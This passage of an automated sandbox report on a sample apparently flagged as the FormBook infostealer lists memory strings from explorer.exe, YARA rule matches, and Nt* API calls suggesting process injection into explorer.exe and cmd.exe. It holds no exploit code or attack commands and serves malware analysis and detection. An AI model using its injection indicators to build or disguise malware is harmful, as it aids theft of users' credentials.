          Source: explorer.exe, 00000003.00000000.1725122365.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4170182373.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1726392086.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.0000000009701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.0000000009701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: n0srYVYMDI.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmd.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A44B NtClose,2_2_0041A44B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,2_2_0041A4FB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792B60 NtClose,LdrInitializeThunk,2_2_01792B60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01792BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AD0 NtReadFile,LdrInitializeThunk,2_2_01792AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01792D30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01792D10
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01792DF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DD0 NtDelayExecution,LdrInitializeThunk,2_2_01792DD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01792C70
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01792CA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F30 NtCreateSection,LdrInitializeThunk,2_2_01792F30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FE0 NtCreateFile,LdrInitializeThunk,2_2_01792FE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FB0 NtResumeThread,LdrInitializeThunk,2_2_01792FB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01792F90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01792EA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01792E80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01794340 NtSetContextThread,2_2_01794340
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01794650 NtSuspendThread,2_2_01794650
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BE0 NtQueryValueKey,2_2_01792BE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792BA0 NtEnumerateValueKey,2_2_01792BA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792B80 NtQueryInformationFile,2_2_01792B80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AF0 NtWriteFile,2_2_01792AF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792AB0 NtWaitForSingleObject,2_2_01792AB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792D00 NtSetInformationFile,2_2_01792D00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792DB0 NtEnumerateKey,2_2_01792DB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C60 NtCreateKey,2_2_01792C60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792C00 NtQueryInformationProcess,2_2_01792C00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CF0 NtOpenProcess,2_2_01792CF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792CC0 NtQueryVirtualMemory,2_2_01792CC0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792F60 NtCreateProcessEx,2_2_01792F60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792FA0 NtQuerySection,2_2_01792FA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792E30 NtWriteVirtualMemory,2_2_01792E30
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792EE0 NtQueueApcThread,2_2_01792EE0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793010 NtOpenDirectoryObject,2_2_01793010
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793090 NtSetValueKey,2_2_01793090
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017935C0 NtCreateMutant,2_2_017935C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017939B0 NtGetContextThread,2_2_017939B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793D70 NtOpenThread,2_2_01793D70
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01793D10 NtOpenProcessToken,2_2_01793D10
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC4E12 NtProtectVirtualMemory,3_2_10DC4E12
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC3232 NtCreateFile,3_2_10DC3232
          Source: C:\Windows\explorer.exeCode function: 3_2_10DC4E0A NtProtectVirtualMemory,3_2_10DC4E0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00254823
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0025643A NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_0025643A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00267460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00267460
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002564CA NtQueryInformationToken,4_2_002564CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026A135 NtSetInformationFile,4_2_0026A135
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00256500 NtQueryInformationToken,NtQueryInformationToken,4_2_00256500
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0026C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_0026C1FA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,4_2_00244E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00254759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,4_2_00254759
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12B60 NtClose,LdrInitializeThunk,4_2_03C12B60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12AD0 NtReadFile,LdrInitializeThunk,4_2_03C12AD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12FE0 NtCreateFile,LdrInitializeThunk,4_2_03C12FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12F30 NtCreateSection,LdrInitializeThunk,4_2_03C12F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_03C12EA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DD0 NtDelayExecution,LdrInitializeThunk,4_2_03C12DD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03C12DF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03C12D10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03C12CA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C60 NtCreateKey,LdrInitializeThunk,4_2_03C12C60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03C12C70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C135C0 NtCreateMutant,LdrInitializeThunk,4_2_03C135C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C14340 NtSetContextThread,4_2_03C14340
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C14650 NtSuspendThread,4_2_03C14650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BE0 NtQueryValueKey,4_2_03C12BE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03C12BF0 NtAllocateVirtualMemory,4_2_03C12BF0
